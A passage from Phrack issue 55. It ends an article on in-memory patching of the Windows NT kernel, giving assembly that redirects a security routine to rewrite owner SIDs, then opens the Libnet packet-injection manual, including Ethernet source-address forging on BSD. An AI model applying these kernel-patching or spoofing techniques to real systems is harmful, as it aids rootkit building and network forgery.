ntoskrnl!PsCreateSystemThread+0731 at 0008:801932A1 (SS:EBP 0010:F8CDFEDC)
ntoskrnl!PsCreateSystemProcess+05FD at 0008:801938B1 (SS:EBP 0010:F8CDFE8C)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFDEC)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFD1C)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFCE4)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFCD0)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
0010:F8CDFCBC)
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
0010:F8CDFC9C)
(SeTokenImpersonationLevel)
:stack
ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
ntoskrnl!PsCreateSystemThread+0731 at 0008:801932A1 (SS:EBP 0010:F8CDFEDC)
ntoskrnl!PsRevertToSelf+0063 at 0008:8013577D (SS:EBP 0010:F8CDFE8C)
ntoskrnl!SeTokenImpersonationLevel+01A3 at 0008:8019F12F (SS:EBP 0010:F8CDFDE8)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFD9C)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFCCC)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFC94)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFC80)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
0010:F8CDFC6C)
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
0010:F8CDFC4C)
I began by trying to patch this call. I decided to try and detect the Owner
SID of BUILTIN\Administrators (1-5-20-220) and change it to BUILTIN\Users
(1-5-20-221) on the fly. The following code is what I patched in:
First, I located a region of memory where I could dump some extra code. For
testing, I chose the region at 08:8000F2B0. I found it to be initially all
zeroed out, so I figured it safe for a while. Next, I assembled some
instructions into this new area:
8000F2B0: push ebx
mov ebx, [eax + 08]
cmp ebx, 20 ; check the 20 in 1-5-20-XXX
nop ; nop's are leftovers from
; debugging
nop
jnz 8000f2c2 ; skip it if we aren't looking
; at a 20
mov word ptr [eax+0c], 221 ; write over old RID w/ new RID
; of 221
nop
8000f2c2: pop ebx
nop
mov esi, [ebp + 0c] ; the two instructions
mov [esi], eax ; that I nuked to make the
; initial jump
jmp 80184ae1
Now, notice the last two instructions prior to the jump back to NT. To make
this call, I had to install a JMP instruction into the NT subroutine itself.
Doing that nuked two actual instructions, as follows:
Original code:
80184ADC mov esi, [ebp+arg_4];<**===--- PATCHING A JUMP
; HERE
80184ADF mov [esi], eax
80184AE1 mov ax, [edx+2] ; some sort of flags
; 01 00 >04< 80 5C
80184AE5 mov edx, [ebp+arg_8]; argument 3, which is to be
; filled in with flags data
After patch:
80184ADC JMP 8000F2B0 ; Note: this nuked two real
; instructions...
80184AE1 mov ax, [edx+2] ; some sort of flags
; 01 00 >04< 80 5C
80184AE5 mov edx, [ebp+arg_8]; argument 3, which is to be
; filled in with flags data
So, to correct this, the code that I am jumping to runs the two missing
instructions:
mov esi, [ebp + 0c] ; the two instructions
mov [esi], eax ; that I nuked to make the
; initial jump
Alas, all is good. I tested this patch for quite some time without a problem.
To verify that it was working, I checked the memory during the patch, and sure
enough, it was turning SID 1-5-20-220 into SID 1-5-20-221. However, as with
all projects, I was not out of the water yet. When getting the security
properties for a file, the Owner still shows up as Administrators. This patch
is clearly called during such a query, as I have set breakpoints. However,
the displayed OWNER is still administrators, even though I am patching the
SID in memory. Further investigation has revealed that this routine isn't
called to check access to a file object, but is called for opening process
tokens, creating processes, and creating threads. Perhaps someone could shed
some more light on this? Nonetheless, the methods used in this patch can be
re-purposed for almost any Kernel routine, so I hope it has been a useful
journey.
Appendix A: Exported functions for the SRM:
-------------------------------------------
SeAccessCheck
SeAppendPrivileges
SeAssignSecurity
SeAuditingFileEvents
SeAuditingFileOrGlobalEvents
SeCaptureSecurityDescriptor
SeCaptureSubjectContext
SeCloseObjectAuditAlarm
SeCreateAccessState
SeCreateClientSecurity
SeDeassignSecurity
SeDeleteAccessState
SeDeleteObjectAuditAlarm
SeExports
SeFreePrivileges
SeImpersonateClient
SeLockSubjectContext
SeMarkLogonSessionForTerminationNotification
SeOpenObjectAuditAlarm
SeOpenObjectForDeleteAuditAlarm
SePrivilegeCheck
SePrivilegeObjectAuditAlarm
SePublicDefaultDacl
SeQueryAuthenticationIdToken
SeQuerySecurityDescriptorInfo
SeRegisterLogonSessionTerminatedRoutine
SeReleaseSecurityDescriptor
SeReleaseSubjectContext
SeSetAccessStateGenericMapping
SeSetSecurityDescriptorInfo
SeSinglePrivilegeCheck
SeSystemDefaultDacl
SeTokenImpersonationLevel
SeTokenType
SeUnlockSubjectContext
SeUnregisterLogonSessionTerminatedRoutine
SeValidSecurityDescriptor
Here are the exported functions for the Object Manager:
ObAssignSecurity
ObCheckCreateObjectAccess
ObCheckObjectAccess
ObCreateObject
ObDereferenceObject
ObfDereferenceObject
ObFindHandleForObject
ObfReferenceObject
ObGetObjectPointerCount
ObGetObjectSecurity
ObInsertObject
ObMakeTemporaryObject
ObOpenObjectByName
ObOpenObjectByPointer
ObQueryNameString
ObQueryObjectAuditingByHandle
ObReferenceObjectByHandle
ObReferenceObjectByName
ObReferenceObjectByPointer
ObReleaseObjectSecurity
ObSetSecurityDescriptorInfo
Here are the exported functions for the IO Manager:
IoAcquireCancelSpinLock
IoAcquireVpbSpinLock
IoAdapterObjectType
IoAllocateAdapterChannel
IoAllocateController
IoAllocateErrorLogEntry
IoAllocateIrp
IoAllocateMdl
IoAssignResources
IoAttachDevice
IoAttachDeviceByPointer
IoAttachDeviceToDeviceStack
IoBuildAsynchronousFsdRequest
IoBuildDeviceIoControlRequest
IoBuildPartialMdl
IoBuildSynchronousFsdRequest
IoCallDriver
IoCancelIrp
IoCheckDesiredAccess
IoCheckEaBufferValidity
IoCheckFunctionAccess
IoCheckShareAccess
IoCompleteRequest
IoConnectInterrupt
IoCreateController
IoCreateDevice
IoCreateFile
IoCreateNotificationEvent
IoCreateStreamFileObject
IoCreateSymbolicLink
IoCreateSynchronizationEvent
IoCreateUnprotectedSymbolicLink
IoDeleteController
IoDeleteDevice
IoDeleteSymbolicLink
IoDetachDevice
IoDeviceHandlerObjectSize
IoDeviceHandlerObjectType
IoDeviceObjectType
IoDisconnectInterrupt
IoDriverObjectType
IoEnqueueIrp
IoFastQueryNetworkAttributes
IofCallDriver
IofCompleteRequest
IoFileObjectType
IoFreeController
IoFreeIrp
IoFreeMdl
IoGetAttachedDevice
IoGetBaseFileSystemDeviceObject
IoGetConfigurationInformation
IoGetCurrentProcess
IoGetDeviceObjectPointer
IoGetDeviceToVerify
IoGetFileObjectGenericMapping
IoGetInitialStack
IoGetRelatedDeviceObject
IoGetRequestorProcess
IoGetStackLimits
IoGetTopLevelIrp
IoInitializeIrp
IoInitializeTimer
IoIsOperationSynchronous
IoIsSystemThread
IoMakeAssociatedIrp
IoOpenDeviceInstanceKey
IoPageRead
IoQueryDeviceDescription
IoQueryDeviceEnumInfo
IoQueryFileInformation
IoQueryVolumeInformation
IoQueueThreadIrp
IoRaiseHardError
IoRaiseInformationalHardError
IoReadOperationCount
IoReadTransferCount
IoRegisterDriverReinitialization
IoRegisterFileSystem
IoRegisterFsRegistrationChange
IoRegisterShutdownNotification
IoReleaseCancelSpinLock
IoReleaseVpbSpinLock
IoRemoveShareAccess
IoReportHalResourceUsage
IoReportResourceUsage
IoSetDeviceToVerify
IoSetHardErrorOrVerifyDevice
IoSetInformation
IoSetShareAccess
IoSetThreadHardErrorMode
IoSetTopLevelIrp
IoStartNextPacket
IoStartNextPacketByKey
IoStartPacket
IoStartTimer
IoStatisticsLock
IoStopTimer
IoSynchronousPageWrite
IoThreadToProcess
IoUnregisterFileSystem
IoUnregisterFsRegistrationChange
IoUnregisterShutdownNotification
IoUpdateShareAccess
IoVerifyVolume
IoWriteErrorLogEntry
IoWriteOperationCount
IoWriteTransferCount
Here are the exported functions for the LSA:
LsaCallAuthenticationPackage
LsaDeregisterLogonProcess
LsaFreeReturnBuffer
LsaLogonUser
LsaLookupAuthenticationPackage
LsaRegisterLogonProcess
The only imports are from the HAL DLL:
HAL.ExAcquireFastMutex
HAL.ExReleaseFastMutex
HAL.ExTryToAcquireFastMutex
HAL.HalAllocateAdapterChannel
HAL.HalBeginSystemInterrupt
HAL.HalClearSoftwareInterrupt
HAL.HalDisableSystemInterrupt
HAL.HalDisplayString
HAL.HalEnableSystemInterrupt
HAL.HalEndSystemInterrupt
HAL.HalGetEnvironmentVariable
HAL.HalHandleNMI
HAL.HalProcessorIdle
HAL.HalQueryDisplayParameters
HAL.HalRequestSoftwareInterrupt
HAL.HalReturnToFirmware
HAL.HalSetEnvironmentVariable
HAL.HalSetRealTimeClock
HAL.HalStartProfileInterrupt
HAL.HalStopProfileInterrupt
HAL.HalSystemVectorDispatchEntry
HAL.KdPortPollByte
HAL.KdPortRestore
HAL.KdPortSave
HAL.KeGetCurrentIrql
HAL.KeLowerIrql
HAL.KeRaiseIrql
HAL.KeRaiseIrqlToDpcLevel
HAL.KeRaiseIrqlToSynchLevel
HAL.KfAcquireSpinLock
HAL.KfLowerIrql
HAL.KfRaiseIrql
HAL.KfReleaseSpinLock
HAL.READ_PORT_UCHAR
HAL.READ_PORT_ULONG
HAL.READ_PORT_USHORT
HAL.WRITE_PORT_UCHAR
HAL.WRITE_PORT_ULONG
HAL.WRITE_PORT_USHORT
----[ EOF
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 06 of 19 ]
-------------------------[ The Libnet Reference Manual v.01 ]
--------[ route <route@infonexus.com> ]
----[ 1] Impetus
If you are required to write C code (either by vocation or hobby) that at
some point, must inject packets into a network, and the traditionally
provided system APIs are insufficient, libnet is for you. Libnet provides
a simple API to quickly build portable programs that write network packets.
Libnet was written for two main reasons. 1) To establish a simple interface
by which network programmers could ignore the subtleties and nuances of
low-level network programming (and therefore concentrate on writing their
programs). 2) To mitigate the irritation many network programmers experienced
due to the lack of standards.
To be honest, I can't believe someone didn't write something like libnet
(also termed "libpwrite") a long time ago. It seemed like such an obvious
gap that needed to be filled. I was sure the LBNL guys (Lawrence Berkeley
National Laboratory -- they wrote libpcap[1]) would put something together.
I mean, Libnet, simply put, is the packet injector analog to libpcap. They
are brothers (or sisters).
To sum it up, this is a treatise on the art of manufacturing network packets
in an efficient, consistent and portable manner using libnet.
Libnet in and of itself, has nothing to do with security. However, libnet
is a wonderful utility for writing security-related applications, tools
and modules. Many recent exploits have been rapidly developed using libnet as
have many security related tools. Take a look at the libnet projects URL
section below for some examples.
----[ 2] Overview
Libnet is a simple C library. It is designed to be small, efficient and
easy to use. Libnet's main goal is portable packet creation and injection.
At the time this manual was written, Libnet was in version 0.99f and had 15
different packet assemblers and two types of packet injection, IP-layer and
link-layer (more on those below).
By itself, libnet is moderately useful. It can build and inject packets to
the network. Libnet, however, has no provisions for packet capture. For
this, one must look to libpcap. Together, libnet and libpcap are powerful
tools available to the network programmer.
Libnet consists of about:
- 7300 lines of code
- 32 source files
- 5 include files
- ~54 functions
- ~43 user-accessable / implemented functions
----[ 3] Design Decisions (past, present and future)
Libnet is very much an ongoing learning/research project. When I started
it over a year and a half ago, I had no idea it would grow as it did
incorporating as much functionality as it does. Libnet's design has changed
not so much in stages, but rather in evolutions. Many of these evolutionary
changes I took from other successful libraries out there. Some of the changes
are hard to pass and are still in progress, while some were just simple
internal changes. Then there were some modifications to the library that
unfortunately changed the interface and obsoleted older versions. In this
section I hope enlighten the reader as to some of the design decisions that go
into libnet; where it was, where it is, and where it's going.
Modularity (interfaces and implementations)
-------------------------------------------
Big programs are made up of many modules [3]. These modules provide the user
with functions and data structures that are to be used in a program. A module
comes in two parts: its interface and its implementation. The interface
specifies what a module does, while the implementation specifies how the
module does it. The interface declares all of the data types, function
prototypes, global information, macros, or whatever is required by the module.
The implementation adheres to the specifications set forth by the interface.
This is how libnet was and is designed. Each implementation, you'll find,
has a corresponding interface.
There is a third piece of this puzzle: the client. The client is the piece
of code that imports and employs the interface, without having to even see
the implementation. Your code is the client.
For more information on interfaces and implementations in C, I urge the reader
to check out [3]. It's an excellent book that changed the way I wrote code.
Nomenclature
------------
Initially, the naming of files, functions and other tidbits didn't seem to
be that important. They took on whatever names seemed appropriate at the
time. In a stand-alone program, this is bad style. In a library, it's bad
style AND potentially error-prone. Library code is intended to be used on
different platforms and potentially with other libraries. If one of these
other libraries (or potentially the user's code) contains an object with the
same name, problems result. Therefore, naming has become an important issue
to me. A strict naming convention helps in two major areas:
- for filenames it keeps them ordered in a directory making for easy
perusal
- for function names, macros, and symbols it cuts down on redefinition
problems and makes the interface much easier to learn
Error Handling and Reporting
----------------------------
Error handling and reporting is an essential part of any programming
paradigm. Delicate handling of and recovery from error conditions is an
absolute necessity, especially in a third party library. I believe Libnet
now has decent error handling (see below for a dissertation on assertions).
It can recover from most bad situations more or less gracefully. It
checks for illegal conditions under most circumstances. Reporting, however,
is a different story and is still progressing. Libnet needs to have a standard
error reporting convention in place. As it stands now, some functions use
errno (since they are basically system call wrappers), while some accept
an additional buffer argument to hold potentional error messages, and still
others as yet have no provision for verbose error reporting. This needs to
change and possibly might be accomplished using variable argument lists.
Assertions and Exit Points
--------------------------
assert(3) is a macro that accepts a single argument which it treats as an
expression, evaluating it for truth. If the expression is evaluated to be
false, the assert macro prints an error message and aborts (terminates) the
program. Assertions are useful in the developmental stages of programs when
verbose error handling is not in place or when a grievous error condition
that normally should not happen occurs. Initially libnet was riddled with
assertions. Libnet mainly employed assertions to catch NULL pointer
dereferences before they occurred (many libnet functions accept pointer
arguments expecting them to actually point somewhere). This seemed reasonable
at the time because this is obviously a grievous error -- if you're passing a
NULL pointer when you shouldn't, your program is probably going to crash.
However, assertions also riddled the library with numerous potential
unpredictable exit points. Exit points inside a supplementary library such as
libnet are bad style, let alone unpredictable exit points. Library code should
not cause or allow a program to exit. If a grievous error condition is
detected, the library should return error codes to the main, and let it decide
what to do. Code should be able to handle grievous errors well enough to be
able to exit gracefully from the top level (if possible). In any event, the
assertions were removed in version 0.99f in favor of error indicative return
values. This preserves compatibility, while removing the exit points.
IPv4 vs IPv6
------------
Libnet currently only supports IPv4. Support for IPv6 is definitely
planned, however. The main consideration is nomenclature. Had I been
mister-cool-smart guy in the beggining, I would have anticipated this and
added IP version information to the function names and macros e.g.:
ipv4_build_ip, IPV4_H. However at this point, I refuse to force users to
adopt to yet another interface, so the IPv6 functions and macros will contain
IPv6 in the name (much like the POSIX 1.g sockets interface [2]).
The Configure Script
--------------------
Early on in the development of libnet, it became clear that there was much
OS and architecture dependent code that had to conditionally included and
compiled. The autoconf configuration stuff (circa version 0.7) worked great to
determine what needed to be included and excluded in order to build the
library, but did nothing for post-install support. Many of these CPP macros
were needed to conditionally include header information for user-based code.
This was initially handled by relying on the user to define the proper macros,
but this quickly proved inefficient.
Libnet now employs a simple configure script. This script is created during
autoconf configuration and is installed when the library is installed. It
handles all of the OS and architecture dependencies automatically - however,
it is now mandatory to use it. You will not be able to compile libnet-based
code without. See the next section for details on how to invoke the script.
----[ 4] A Means to an Ends
This section covers operational issues including how to employ the library in
a useful manner as well noting some of its quirks.
The Order of Operations
-----------------------
In order to build and inject an arbitrary network packet, there is a standard
order of operations to be followed. There are five easy steps to packet
injection happiness:
1) Network initialization
2) Memory initialization
3) Packet construction
4) Packet checksums
5) Packet injection
Each one of these is an important topic and is covered below.
Memory allocation and initialization
------------------------------------
The first step in using libnet is to allocate memory for a packet. The
conventional way to do this is via a call to libnet_init_packet(). You just
need to make sure you specify enough memory for whatever packet you're going
to build. This will also require some forthought as to which injection method
you're going to use (see below for more information). If you're going to
build a simple TCP packet (sans options) with a 30 byte payload using the
IP-layer interface, you'll need 70 bytes (IP header + TCP header + payload).
If you're going to build the same packet using the link-layer interface, you'll
need 84 bytes (ethernet header + IP header + TCP header + payload). To be
safe you can simply allocate IP_MAXPACKET bytes (65535) and not worry about
overwriting buffer boundries. When finished with the memory, it should be
released with a call to libnet_destroy_packet() (this can either be in a
garbage collection function or at the end of the program).
Another method of memory allocation is via the arena interface. Arenas are
basically memory pools that allocate large chunks of memory in one call,
divy out chunks as needed, then deallocate the whole pool when done. The
libnet arena interface is useful when you want to preload different kinds
of packets that you're potentially going to be writing in rapid succession.
It is initialized with a call to libnet_init_packet_arena() and chunks are
retrieved with libnet_next_packet_from_arena(). When finished with the memory
it should be released with a call to libnet_destroy_packet_arena() (this can
either be in a garbage collection function or at the end of the program).
An important note regarding memory management and packet construction: If you
do not allocate enough memory for the type of packet you're building, your
program will probably segfault on you. Libnet can detect when you haven't
passed *any* memory, but not when you haven't passed enough. Take heed.
Network initialization
----------------------
The next step is to bring up the network injection interface. With the
IP-layer interface, this is with a call to libnet_open_raw_sock() with the
appropriate protocol (usually IPPROTO_RAW). This call will return a raw
socket with IP_HDRINCL set on the socket telling the kernel you're going
to build the IP header.
The link-layer interface is brought up with a call to
libnet_open_link_interface() with the proper device argument. This will
return a pointer to a ready to go link interface structure.
Packet construction
-------------------
Packets are constructed modularly. For each protocol layer, there should
be a corresponding call to a libnet_build function. Depending on your
end goal, different things may happen here. For the above IP-layer example,
calls to libnet_build_ip() and libnet_build_tcp() will be made. For the
link-layer example, an additional call to libnet_build_ethernet() will be
made. The ordering of the packet constructor function calls is not important,
it is only important that the correct memory locations be passed to these
functions. The functions need to build the packet headers inside the buffer
as they would appear on the wire and be demultiplexed by the recipient.
For example:
14 bytes 20 bytes 20 bytes
__________________________________________________________
| ethernet | IP | TCP |
|______________|____________________|____________________|
libnet_build_ethernet() would be passed the whole buffer (as it needs to build
an ethernet header at the front of the packet). libnet_build_ip() would get
the buffer 14 bytes (ETH_H) beyond this to construct the IP header in the
correct location, while libnet_build_tcp() would get the buffer 20 bytes
beyond this (or 34 bytes beyond the beginning (ETH_H + IP_H)). This is
easily apparent in the example code.
Packet checksums
----------------
The next-to-last step is computing the packet checksums (assuming the packet
is an IP packet of some sort). For the IP-layer interface, we need only
compute a transport layer checksum (assuming our packet has a transport
layer protocol) as the kernel will handle our IP checksum. For the link-layer
interface, the IP checksum must be explicitly computed. Checksums are
calculated via libnet_do_checksum(), which will be expecting the buffer passed
to point to the IP header of the packet.
Packet injection
----------------
The last step is to write the packet to the network. Using the IP-layer
interface this is accomplished with libnet_write_ip(), and with the link-layer
interface it is accomplished with libnet_write_link_layer(). The functions
return the number of bytes written (which should jive with the size of your
packet) or a -1 on error.
Using the Configure Script
--------------------------
There has been some confusion on how to correctly implement the
libnet-configure shell script. Since 0.99e, it has become mandatory to use
this script. The library will not compile code without it. This is to avoid
potential problems when user code is compiled with improper or missing CPP
macros. The script also has provisions for specifiing libraries and cflags.
The library switch is useful on architectures that require additional
libraries to compile network code (such as Solaris). The script is very
simple to use. The following examples should dispell any confusion:
At the command line you can run the script to see what defines are
used for that system:
shattered:~> libnet-config --defines
-D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H
-DLIBNET_LIL_ENDIAN
shattered:~> gcc -Wall `libnet-config --defines` foo.c -o foo
`libnet-config --libs`
In a Makefile:
DEFINES = `libnet-config --defines`
In a Makefile.in (also employing autoheader):
DEFINES = `libnet-config --defines` @DEFS@
IP-layer vs. Link-layer
-----------------------
People often wonder when to use the link-layer interface in place of the
IP-layer interface. It's mainly trading of power and complexity for ease of
use. The link-layer interface is slightly more complex and requires more
coding. It's also more powerful and is a lot more portable (if you want
to build ARP/RARP/ethernet frames it's the only way to go). It is basically
a matter of what you need to get done.
One major issue with the link-layer interface is that in order to send packets
to arbirtrary remote Internet hosts, it needs to know the MAC address of the
first hop router. This is accomplished via ARP packets, but if proxy ARP
isn't being done, you run into all kinds of problems determining whose MAC
address to request. Code to portably alleviate this problem is being
developed.
Spoofing Ethernet Addresses
---------------------------
Certain operating systems (specifically ones that use the Berkeley Packet
Filter for link-layer access) do not allow for arbitrary specification of
source ethernet addresses. This is not so much a bug as it is an oversight
in the protocol. The way around this is to patch the kernel. There are two
ways to patch a kernel, either statically, with kernel diffs (which requires
the individual to have the kernel sources, and know how to rebuild and install
a new kernel) or dynamically, with loadable kernel modules (lkms). Since it's
a bit overzealous to assume people will want to patch their kernel for a
library, included with the libnet distribution is lkm code to seamlessly
bypass the bpf restriction.
In order to spoof ethernet packets on bpf-based systems (currently supported
are FreeBSD and OpenBSD) do the following: cd to the proper support/bpf-lkm/
directory, build the module, and modload it.
The module works as per the following description:
The 4.4BSD machine-independent ethernet driver does not allow upper layers
to forge the ethernet source address; all ethernet outputs cause the output
routine to build a new ethernet header, and the process that does this
explicitly copies the MAC address registered to the interface into this header.
This is odd, because the bpf writing convention asserts that writes to bpf
must include a link-layer header; it's intuitive to assume that this header
is, along with the rest of the packet data, written to the wire.
This is not the case. The link-layer header is used solely by the
bpf code in order to build a sockaddr structure that is passed to the generic
ethernet output routine; the header is then effectively stripped off the
packet. The ethernet output routine consults this sockaddr to obtain the
ethernet type and destination address, but not the source address.
The Libnet lkm simply replaces the standard ethernet output routine with a
slightly modified one. This modified version retrieves the source ethernet
address from the sockaddr and uses it as the source address for the header
written the wire. This allows bpf to be used to seamlessly forge ethernet
packets in their entirety, which has applications in address management.
The modload glue provided traverses the global list of system interfaces,
and replaces any pointer to the original ethernet output routine with the
new one we've provided. The unload glue undoes this. The effect of loading
this module will be that all ethernet interfaces on the system will support
source address forging.
Thomas H. Ptacek wrote the first version of this lkm in 1997.
Raw Sockets Limitations
-----------------------
Raw sockets are horribly non-standard across different platforms.
- Under some x86 BSD implementations the IP header length and fragmentation
bits need to be in host byte order, and under others, network byte order.
- Solaris does not allow you to set many IP header related bits including
the length, fragmentation flags, or IP options.
- Linux, on the other hand, seems to allow the setting of any bits to any
value (the exception being the IP header checksum, which is always done
by the kernel -- regardless of OS type).
Because of these quirks, unless your code isn't designed to be multi-platform,
you should use libnet's link-layer interface instead.
----[ 5] Internals
Libnet can be broken down into 4 basic sections: memory management, address
resolution, packet handling, and support. In this section we cover every
user-accessible function libnet has to offer.
Proceeding each function prototype is a small reference chart listing the
return values of the function, whether or not the function is reentrant (a
function is considered reentrant if it may be called repeatedly, or may be
called before previous invocations have completed, and each invocation is
independent of all other invocations) and a brief description of the function's
arguments.
If you're wondering, yes, this is basically a verbose manpage, however, much of
it is new and additional verbiage, supplemental to the existing manual page.
Memory Management Functions
---------------------------
int libnet_init_packet(u_short, u_char **);
RV on success: 1
RV on failure: -1
Re-entrant: yes
Arguments: 1 - desired packet size
2 - pointer to a character pointer to contain packet memory
libnet_init_packet() creates memory for a packet. Well, it doesn't so much
create memory as it requests it from the OS. It does, however, make
certain the memory is zero-filled. The function accepts two arguments, the
packet size and the address of the pointer to the packet. The packet size
parameter may be 0, in which case the library will attempt to guess a
packet size for you. The pointer to a pointer is necessary as we are
allocating memory locally. If we simply pass in a pointer (even though
we are passing in an address, we are referencing the value as a pointer --
so in essence we would be passing by value) the memory will be lost. If
we pass by address, we will retain the requested heap memory.
This function is a good example of interface hiding. This function is
essentially a malloc() wrapper. By using this function the details of
what's really happening are abstracted so that you, the programmer, can
worry about your task at hand.
void libnet_destroy_packet(u_char **);
RV on success: NA
RV on failure: NA
Reentrant: yes
Arguments: 1 - pointer to a character pointer to containing packet
memory
libnet_destroy_packet() is the free() analog to libnet_init_packet. It
destroys the packet referenced by 'buf'. In reality, it is of course a
simple free() wrapper. It frees the heap memory and points `buf` to NULL
to dispel the dangling pointer. The function does make the assertion that
`buf` is not NULL. A pointer to a pointer is passed to maintain
interface consistency.
int libnet_init_packet_arena(struct libnet_arena **, u_short, u_short);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to an arena pointer (preallocated arena)
2 - number of packets
3 - packet size
libnet_init_packet_arena() allocates and initializes a memory pool.
If you plan on building and sending several different packets, this is
a good choice. It allocates a pool of memory from which you can grab
chunks to build packets (see next_packet_from_arena()). It takes the
address to an arena structure pointer, and hints on the possible packet
size and number of packets. The last two arguments are used to compute
the size of the memory pool. As before, they can be set to 0 and the
library will attempt to choose a decent value. The function returns -1
if the malloc fails or 1 if everything goes ok.
u_char *libnet_next_packet_from_arena(struct libnet_arena **, u_short);
RV on success: pointer to the requested packet memory
RV on failure: NULL
Reentrant: yes
Arguments: 1 - pointer to an arena pointer
2 - requested packet size
libnet_next_packet_from_arena() returns a chunk of memory from the
specified arena of the requested size and decrements the available
byte counter. If the requested memory is not available from the arena, the
function returns NULL. Note that there is nothing preventing a poorly
coded application from using more memory than requested and causing
all kinds of problems. Take heed.
void libnet_destroy_packet_arena(struct libnet_arena **);
RV on success: NA
RV on failure: NA
Reentrant: yes
Arguments: 1 - pointer to an arena pointer
libnet_destroy_packet_arena() frees the memory associated with the
specified arena.
Address Resolution Functions
----------------------------
u_char *libnet_host_lookup(u_long, u_short);
RV on success: human readable IP address
RV on failure: NULL
Reentrant: no
Arguments: 1 - network-byte ordered IP address
2 - flag to specify whether or not to look up canonical
hostnames (symbolic constant)
libnet_host_lookup() converts the supplied network-ordered (big-endian)
IP address into its human-readable counterpart. If the usename flag is
LIBNET_RESOLVE, the function will attempt to resolve the IP address
(possibly incurring DNS traffic) and return a canonical hostname, otherwise
if it is LIBNET_DONT_RESOLVE (or if the lookup fails), the function returns
a dotted-decimal ASCII string. This function is hopelessly non reentrant
as it uses static data.
void libnet_host_lookup_r(u_long, u_short, u_char *);
RV on success: NA
RV on failure: NA
Reentrant: maybe
Arguments: 1 - network-byte ordered IP address
2 - flag to specify whether or not to look up canonical
hostnames (symbolic constant)
libnet_host_lookup_r() is the planned reentrant version of the above
function. As soon as reentrant network resolver libraries become
available, this function will likewise be reentrant. An additional
argument of a buffer to store the converted (or resolved) IP address is
supplied by the user.
u_long libnet_name_resolve(u_char *, u_short);
RV on success: network-byte ordered IP address
RV on failure: -1
Reentrant: yes
Arguments: 1 - human readable hostname
2 - flag to specify whether or not to look up canonical
hostnames (symbolic constant)
libnet_name_resolve() takes a NULL terminated ASCII string representation
of an IP address (dots and decimals or, if the usename flag is
LIBNET_RESOLVE, canonical hostname) and converts it into a network-ordered
(big-endian) unsigned long value.
u_long libnet_get_ipaddr(struct link_int *, const u_char *, const u_char *);
RV on success: requested IP address
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to a link interface structure
2 - pointer to the device to query
3 - pointer to a buf to contain a possible error message
libnet_get_ipaddr() returns the IP address of a specified network device.
The function takes a pointer to a link layer interface structure, a
pointer to the network device name, and an empty buffer to be used in case
of error. Upon success the function returns the IP address of the
specified interface in network-byte order or 0 upon error (and errbuf will
contain a reason).
struct ether_addr *libnet_get_hwaddr(struct link_int *, const u_char *,
const u_char *);
RV on success: requested ethernet address (inside of struct ether_addr)
RV on failure: NULL
Reentrant: depends on architecture
Arguments: 1 - pointer to a link interface structure
2 - pointer to the device to query
3 - pointer to a buf to contain a possible error message
libnet_get_hwaddr() returns the hardware address of a specified network
device. At the time of this writing, only ethernet is supported.
The function takes a pointer to a link layer interface structure, a
pointer to the network device name, and an empty buffer to be used in case
of error. The function returns the MAC address of the specified interface
upon success or 0 upon error (and errbuf will contain a reason).
Packet Handling Functions
-------------------------
int libnet_open_raw_sock(int);
RV on success: opened socket file descriptor
RV on failure: -1
Reentrant: yes
Arguments: 1 - protocol number of the desired socket-type (symbolic
constant)
libnet_open_raw_sock() opens a raw IP socket of the specified protocol
type (supported types vary from system to system, but usually you'll want
to open an IPPROTO_RAW socket). The function also sets the IP_HDRINCL
socket option. Returned is the socket file descriptor or -1 on error. The
function can fail if either of the underlying calls to socket or setsockopt
fail. Checking errno will reveal the reason for the error.
int libnet_close_raw_sock(int);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - socket file descriptor to be closed
libnet_close_raw_sock() will close the referenced raw socket.
int libnet_select_device(struct sockaddr_in *, u_char **, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: no
Arguments: 1 - preallocated sockaddr_in structure pointer
2 - pointer to a char pointer containing the device
3 - pointer to a buf to contain a possible error message
libnet_select_device() will run through the list of interfaces and select
one for use (ignoring the loopback device). If the device argument
points to NULL (don't pass in a NULL pointer, the function expects a
pointer to a pointer, and C can't derefrence a NULL pointer) it will
try to fill it in with the first non-loopback device it finds, otherwise,
it will try to open the specified device. If successful, 1 is returned
(and if device was NULL, it will now contain the device name which can
be used in libnet_*link*() type calls). The function can fail for a
variety of reasons, including socket system call failures, ioctl failures,
if no interfaces are found, etc.. If such an error occurs, -1 is returned
and errbuf will contain a reason.
struct link_int *libnet_open_link_interface(char *, char *);
RV on success: filled in link-layer interface structure
RV on failure: NULL
Reentrant: yes
Arguments: 1 - pointer to a char containing the device to open
2 - pointer to a buf to contain a possible error message
libnet_open_link_interface() opens a low-level packet interface. This is
required in order to be able inject link layer frames. Supplied is a
u_char pointer to the interface device name and a u_char pointer to an
error buffer. Returned is a filled-in link_int structure or NULL on
error (with the error buffer containing the reason). The function can
fail for a variety of reasons due to the fact that it is architecture
specific.
int libnet_close_link_interface(struct link_int *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to a link interface structure to be closed
libnet_close_link_interface() closes an opened low-level packet interface.
int libnet_write_ip(int, u_char *, int);
